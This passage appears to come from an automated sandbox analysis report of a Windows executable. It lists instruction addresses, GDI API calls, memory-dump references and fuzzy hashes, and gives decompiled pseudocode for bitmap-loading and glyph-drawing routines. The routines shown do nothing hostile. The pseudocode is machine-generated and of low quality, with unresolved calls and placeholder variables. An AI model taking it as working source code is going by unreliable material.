                                                                                0x004237cd
                                                                                0x004237d0
                                                                                0x004237d1
                                                                                0x004237d6
                                                                                0x004237dd
                                                                                0x00423921
                                                                                0x00423921
                                                                                0x00423923
                                                                                0x00423926
                                                                                0x00423929
                                                                                0x00423932
                                                                                0x00423938
                                                                                0x00423938
                                                                                0x00423941
                                                                                0x00423943
                                                                                0x00423946
                                                                                0x00423947
                                                                                0x00423949
                                                                                0x00000000
                                                                                0x00423949
                                                                                0x0042394e
                                                                                0x004237e3
                                                                                0x004237f0
                                                                                0x004237f9
                                                                                0x0042381a
                                                                                0x0042381b
                                                                                0x00423825
                                                                                0x0042382a
                                                                                0x0042382b
                                                                                0x00423830
                                                                                0x00423833
                                                                                0x0042383a
                                                                                0x0042385a
                                                                                0x0042383c
                                                                                0x0042383c
                                                                                0x00423842
                                                                                0x00423856
                                                                                0x00423856
                                                                                0x00423868
                                                                                0x0042386d
                                                                                0x0042386f
                                                                                0x00423871
                                                                                0x00423875
                                                                                0x00423876
                                                                                0x0042387e
                                                                                0x0042387f
                                                                                0x00423884
                                                                                0x00423886
                                                                                0x0042388a
                                                                                0x0042388b
                                                                                0x00423893
                                                                                0x00423894
                                                                                0x00423894
                                                                                0x0042389e
                                                                                0x004238a5
                                                                                0x004238aa
                                                                                0x004238ac
                                                                                0x004238b1
                                                                                0x004238b5
                                                                                0x004238b9
                                                                                0x004238ba
                                                                                0x004238bc
                                                                                0x004238c1
                                                                                0x004238c2
                                                                                0x004238cc
                                                                                0x004238d5
                                                                                0x004238df
                                                                                0x004238df
                                                                                0x004238e8
                                                                                0x004238eb
                                                                                0x004238eb
                                                                                0x004238f2
                                                                                0x004238f5
                                                                                0x004238f8
                                                                                0x00423906
                                                                                0x004237fb
                                                                                0x0042380d
                                                                                0x00423912
                                                                                0x0042391c
                                                                                0x0042391c
                                                                                0x00000000
                                                                                0x00423912
                                                                                0x004237f9
                                                                                0x004237dd

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,00000054,?), ref: 00423777
                                                                                • 72E7AC50.USER32(00000000,00000000,0042394F,?,00000000,?,?), ref: 004237A5
                                                                                • 72E7A590.GDI32(?,00000000,00000000,0042394F,?,00000000,?,?), ref: 004237B6
                                                                                • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042394F,?,00000000,?,?), ref: 004237D1
                                                                                • SelectObject.GDI32(?,00000000), ref: 004237EB
                                                                                • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042380D
                                                                                • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042394F,?,00000000,?,?), ref: 0042381B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00423863
                                                                                • 72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 00423876
                                                                                • 72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000,?,?,00000001,00000001), ref: 0042387F
                                                                                • 72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000,?), ref: 0042388B
                                                                                • 72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00423907,?,?,?,00000000), ref: 00423894
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0042389E
                                                                                • 72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,00423907), ref: 004238C2
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004238CC
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004238DF
                                                                                • DeleteObject.GDI32(00000000), ref: 004238EB
                                                                                • DeleteDC.GDI32(00000000), ref: 00423901
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042391C
                                                                                • DeleteDC.GDI32(00000000), ref: 00423938
                                                                                • 72E7B380.USER32(00000000,00000000,00423956,00000001,00000000,?,00000000,00000000,0042394F,?,00000000,?,?), ref: 00423949
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                                                                • String ID:
                                                                                • API String ID: 4241548881-0
                                                                                • Opcode ID: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction ID: ad944dd91036beafc7ec954165db9b70d0383b0724a4ea5891ac7e38479d5bc1
                                                                                • Opcode Fuzzy Hash: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction Fuzzy Hash: A35162B1F00224ABDB10EFE9DC45BAEB7FCAB09704F51442AB114F7281C6BCA9508B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424550, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E00424550(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040272C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x424a6d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x424a40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403584(1);
						if(_a4 == 0) {
							E00402EC8( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E004162A0(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t251 = _v64;
					E00402EC8(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E0042009C();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E00416230(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E0042032C( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E00416230(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E0042034C( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E004205F4(_v32);
				}
				_push(0);
				L00406E20();
				_v16 = E004201BC(_t160);
				_push(_t323);
				_push(0x4249bb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x46b514 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00406A60();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B264(_t245, _t257, _t317, _t321);
							} else {
								E0042009C();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00416230(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42498a;
						 *[fs:eax] = _t290;
						_push(0x4249c2);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407080();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040272C(_t321);
					_push(_t323);
					_push(0x424923);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E00416230(_v12, _t321, _v24);
					_push(_v16);
					L00406A58();
					_v20 = E004201BC(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00406A50();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E004208AC(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00406BD0();
						_v56 = _t204;
						_push(_v20);
						L00406BA0();
					}
					_push(_t323);
					_push(0x4248f7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00406A68();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B264(_t245, _t263, _t317, _t321);
						} else {
							E0042009C();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(E004248FE);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00406BD0();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                                                                0x00424550
                                                                                0x00424551
                                                                                0x00424553
                                                                                0x0042455c
                                                                                0x0042455e
                                                                                0x00424561
                                                                                0x00424566
                                                                                0x0042456b
                                                                                0x00424570
                                                                                0x00424580
                                                                                0x00424587
                                                                                0x0042458f
                                                                                0x00424591
                                                                                0x00424591
                                                                                0x004245a8
                                                                                0x004245ae
                                                                                0x004245b3
                                                                                0x004245b4
                                                                                0x004245b9
                                                                                0x004245bc
                                                                                0x004245c1
                                                                                0x004245c2
                                                                                0x004245c7
                                                                                0x004245ca
                                                                                0x004245d1
                                                                                0x00424630
                                                                                0x00424633
                                                                                0x00424639
                                                                                0x0042463f
                                                                                0x00424659
                                                                                0x00424660
                                                                                0x0042466f
                                                                                0x00424674
                                                                                0x00424682
                                                                                0x0042468e
                                                                                0x0042468e
                                                                                0x0042469e
                                                                                0x004246ae
                                                                                0x004246c2
                                                                                0x004246d1
                                                                                0x004246e3
                                                                                0x004246e9
                                                                                0x004246e9
                                                                                0x004245d3
                                                                                0x004245e3
                                                                                0x004245e6
                                                                                0x004245f2
                                                                                0x004245f7
                                                                                0x004245fd
                                                                                0x00424604
                                                                                0x0042460b
                                                                                0x00424613
                                                                                0x00424617
                                                                                0x00424617
                                                                                0x004246ec
                                                                                0x004246f2
                                                                                0x004246fa
                                                                                0x00424702
                                                                                0x00424704
                                                                                0x00424704
                                                                                0x0042470d
                                                                                0x0042470f
                                                                                0x00424717
                                                                                0x00424723
                                                                                0x00424730
                                                                                0x00424735
                                                                                0x00424739
                                                                                0x00424739
                                                                                0x00424723
                                                                                0x00424717
                                                                                0x00424740
                                                                                0x0042474b
                                                                                0x0042474b
                                                                                0x00424751
                                                                                0x0042475d
                                                                                0x00424766
                                                                                0x00424778
                                                                                0x0042477e
                                                                                0x00424780
                                                                                0x0042478c
                                                                                0x00424796
                                                                                0x0042479b
                                                                                0x0042479e
                                                                                0x0042479e
                                                                                0x004247a1
                                                                                0x004247a6
                                                                                0x004247a8
                                                                                0x004247a8
                                                                                0x004247ae
                                                                                0x004247b3
                                                                                0x004247b3
                                                                                0x004247b8
                                                                                0x004247ba
                                                                                0x004247c4
                                                                                0x004247c9
                                                                                0x004247ca
                                                                                0x004247cf
                                                                                0x004247d2
                                                                                0x004247d8
                                                                                0x004247dd
                                                                                0x004247eb
                                                                                0x0042492a
                                                                                0x0042492c
                                                                                0x00424931
                                                                                0x00424932
                                                                                0x00424937
                                                                                0x00424938
                                                                                0x0042493b
                                                                                0x0042493c
                                                                                0x00424941
                                                                                0x00424948
                                                                                0x00424957
                                                                                0x00424960
                                                                                0x00424959
                                                                                0x00424959
                                                                                0x00424959
                                                                                0x00424957
                                                                                0x00424967
                                                                                0x0042496d
                                                                                0x00424970
                                                                                0x0042497b
                                                                                0x00424982
                                                                                0x00424985
                                                                                0x004249a4
                                                                                0x004249a7
                                                                                0x004249aa
                                                                                0x004249af
                                                                                0x004249b2
                                                                                0x004249b3
                                                                                0x004249b5
                                                                                0x004249ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004247f1
                                                                                0x004247f1
                                                                                0x004247f3
                                                                                0x004247fd
                                                                                0x00424802
                                                                                0x00424803
                                                                                0x00424808
                                                                                0x0042480b
                                                                                0x00424811
                                                                                0x00424816
                                                                                0x0042481e
                                                                                0x0042481f
                                                                                0x00424829
                                                                                0x0042482c
                                                                                0x0042482e
                                                                                0x00424830
                                                                                0x00424833
                                                                                0x00424834
                                                                                0x00424843
                                                                                0x00424848
                                                                                0x0042484e
                                                                                0x00424853
                                                                                0x00424855
                                                                                0x00424861
                                                                                0x00424864
                                                                                0x00424869
                                                                                0x0042486a
                                                                                0x0042486d
                                                                                0x0042486e
                                                                                0x00424873
                                                                                0x00424879
                                                                                0x0042487a
                                                                                0x0042487a
                                                                                0x00424881
                                                                                0x00424882
                                                                                0x00424887
                                                                                0x0042488a
                                                                                0x0042488d
                                                                                0x0042488f
                                                                                0x00424892
                                                                                0x00424896
                                                                                0x00424897
                                                                                0x00424899
                                                                                0x0042489a
                                                                                0x0042489d
                                                                                0x0042489e
                                                                                0x004248a3
                                                                                0x004248aa
                                                                                0x004248b3
                                                                                0x004248bc
                                                                                0x004248b5
                                                                                0x004248b5
                                                                                0x004248b5
                                                                                0x004248b3
                                                                                0x004248c3
                                                                                0x004248c6
                                                                                0x004248c9
                                                                                0x004248d2
                                                                                0x004248d4
                                                                                0x004248d9
                                                                                0x004248dd
                                                                                0x004248de
                                                                                0x004248de
                                                                                0x004248f6
                                                                                0x004248f6

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000,?,00000000,00424A6D,?,?), ref: 004247BA
                                                                                • 72E7A590.GDI32(00000001,00000000,00424923,?,00000000,004249BB,?,00000000,?,00000000,00424A6D,?,?), ref: 0042481F
                                                                                • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00424923,?,00000000,004249BB,?,00000000,?,00000000,00424A6D,?,?), ref: 00424834
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042483E
                                                                                • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00424923,?,00000000,004249BB,?,00000000), ref: 0042486E
                                                                                • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00424923,?,00000000,004249BB), ref: 0042487A
                                                                                • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042489E
                                                                                • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004248AC
                                                                                • 72E7B410.GDI32(?,00000000,000000FF,004248FE,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 004248DE
                                                                                • SelectObject.GDI32(?,?), ref: 004248EB
                                                                                • DeleteObject.GDI32(00000000), ref: 004248F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                • String ID: ($0!A$BM
                                                                                • API String ID: 3415089252-1515617234
                                                                                • Opcode ID: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction ID: 460c956ee79e1a374af29936669ac4285e96445d6daf9193b4eb6fa02d8a22bf
                                                                                • Opcode Fuzzy Hash: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction Fuzzy Hash: CED15175B002189FDF04EFA9D885BAEBBF5EF89304F51806AE505E7391D7389840CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046647C, Relevance: 23.0, APIs: 15, Instructions: 468COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E0046647C(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				void* _t325;
				void* _t345;
				void* _t361;
				void* _t368;
				intOrPtr _t382;
				intOrPtr _t388;
				struct HDC__* _t392;
				struct HDC__* _t393;
				struct HDC__* _t394;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr _t447;
				intOrPtr _t464;
				void* _t478;
				signed int _t486;
				void* _t491;
				void* _t493;
				void* _t495;
				intOrPtr _t496;
				void* _t506;

				_t493 = _t495;
				_t496 = _t495 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t388 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t388 != 0xffffffff) {
					L24:
					return _t388;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t486 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t491 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t503 =  *0x46bc88;
							if( *0x46bc88 == 0) {
								 *0x46bc88 = E00466170(1);
							}
							_t382 =  *0x46bc88; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E004661E4(_t382, _t491, _t486);
						}
						_v16 = E00423960(1);
						 *[fs:eax] = _t496;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x466a2b, _t493);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E00412984(0, _t486, 0,  &_v44, _t491);
						E0041F338( *((intOrPtr*)(E00423F28(_v16) + 0x14)), _t486, 0x8000000f, _t486, _t493, _t503);
						E004236F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E00412984(0 * _t486, 1 * _t486, 0,  &_v60, _t491);
						_t209 = _v9 - 1;
						_t506 = _t209;
						if(_t506 < 0) {
							L14:
							_push( &_v60);
							_t213 = E00423F28( *((intOrPtr*)(_v8 + 4)));
							E0041F868(E00423F28(_v16),  &_v44, _t507, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t508 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t508);
							}
							goto L23;
						} else {
							if(_t506 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t496;
								_v24 = E00423960(1);
								_v20 = E00423960(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4669ef, _t493);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)),  *_v24, 0, _t486, _t493, __eflags);
									_t415 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E00423FE4(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E0041EB4C( *((intOrPtr*)(E00423F28(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E00424D78(_v24, 0);
										E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)), _t415, 0xffffff, _t486, _t493, __eflags);
									}
									E00424D78(_v24, 1);
									_t391 = E00423F28(_v16);
									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x8000000f, _t486, _t493, __eflags);
									E0041F9D0(_t258,  &_v44);
									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x80000014, _t486, _t493, __eflags);
									SetTextColor(E0041FDC4(_t391), 0);
									SetBkColor(E0041FDC4(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E0041FDC4(E00423F28(_v24)));
									_push(_t491);
									_push(_t486);
									_push(1);
									_push(1);
									_push(E0041FDC4(_t391));
									L00406A30();
									E0041F338( *((intOrPtr*)(_t391 + 0x14)), _t415, 0x80000010, _t486, _t493, __eflags);
									SetTextColor(E0041FDC4(_t391), 0);
									SetBkColor(E0041FDC4(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E0041FDC4(E00423F28(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(E0041FDC4(_t391));
									L00406A30();
								} else {
									_v28 = E00423F28(_v16);
									E00423F28(_v20);
									E0041F868(_v28,  &_v44, __eflags,  &_v60);
									E00424D78(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)),  *_v24, 0xffffff, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E00423F28(_v20));
									_t325 = E00423F28(_v24);
									_pop(_t421);
									E0041F868(_t325,  &_v44, __eflags);
									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t421, 0x80000014, _t486, _t493, __eflags);
									_t392 = E0041FDC4(_v28);
									SetTextColor(_t392, 0);
									SetBkColor(_t392, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E0041FDC4(E00423F28(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t392);
									L00406A30();
									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)), _t421, 0x808080, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E00423F28(_v20));
									_t345 = E00423F28(_v24);
									_pop(_t422);
									E0041F868(_t345,  &_v44, __eflags);
									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t422, 0x80000010, _t486, _t493, __eflags);
									_t393 = E0041FDC4(_v28);
									SetTextColor(_t393, 0);
									SetBkColor(_t393, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E0041FDC4(E00423F28(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t393);
									L00406A30();
									_push(E0041E68C( *((intOrPtr*)(_v8 + 0x1c))));
									_t361 = E00423F28(_v20);
									_pop(_t478);
									E0041F338( *((intOrPtr*)(_t361 + 0x14)), _t422, _t478, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E00423F28(_v20));
									_t368 = E00423F28(_v24);
									_pop(_t423);
									E0041F868(_t368,  &_v44, __eflags);
									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t423, 0x8000000f, _t486, _t493, __eflags);
									_t394 = E0041FDC4(_v28);
									SetTextColor(_t394, 0);
									SetBkColor(_t394, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E0041FDC4(E00423F28(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t394);
									L00406A30();
								}
								__eflags = 0;
								_pop(_t464);
								 *[fs:eax] = _t464;
								_push(0x4669f6);
								E004035B4(_v20);
								return E004035B4(_v24);
							} else {
								_t507 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t447);
								 *[fs:eax] = _t447;
								_push(0x466a32);
								return E004035B4(_v16);
							}
						}
					}
				}
			}









































                                                                                0x0046647d
                                                                                0x0046647f
                                                                                0x00466485
                                                                                0x00466488
                                                                                0x0046648f
                                                                                0x0046649a
                                                                                0x0046649a
                                                                                0x004664a6
                                                                                0x004664ad
                                                                                0x00466a49
                                                                                0x00466a51
                                                                                0x004664b3
                                                                                0x004664bb
                                                                                0x004664cd
                                                                                0x00000000
                                                                                0x004664d3
                                                                                0x004664db
                                                                                0x004664e7
                                                                                0x004664ea
                                                                                0x004664f7
                                                                                0x00466500
                                                                                0x00466502
                                                                                0x00466509
                                                                                0x00466517
                                                                                0x00466517
                                                                                0x00466520
                                                                                0x0046652d
                                                                                0x0046652d
                                                                                0x0046653c
                                                                                0x0046654a
                                                                                0x00466554
                                                                                0x0046655e
                                                                                0x0046656c
                                                                                0x00466581
                                                                                0x00466591
                                                                                0x0046659d
                                                                                0x004665a9
                                                                                0x004665a9
                                                                                0x004665c2
                                                                                0x004665ca
                                                                                0x004665ca
                                                                                0x004665cc
                                                                                0x004665d9
                                                                                0x004665dc
                                                                                0x004665e3
                                                                                0x004665f5
                                                                                0x004665fd
                                                                                0x00466600
                                                                                0x00466604
                                                                                0x00466646
                                                                                0x00466606
                                                                                0x00466622
                                                                                0x00466622
                                                                                0x00000000
                                                                                0x004665ce
                                                                                0x004665ce
                                                                                0x00466651
                                                                                0x00466656
                                                                                0x00466664
                                                                                0x00466673
                                                                                0x00466682
                                                                                0x00466690
                                                                                0x0046669a
                                                                                0x0046669d
                                                                                0x004666a0
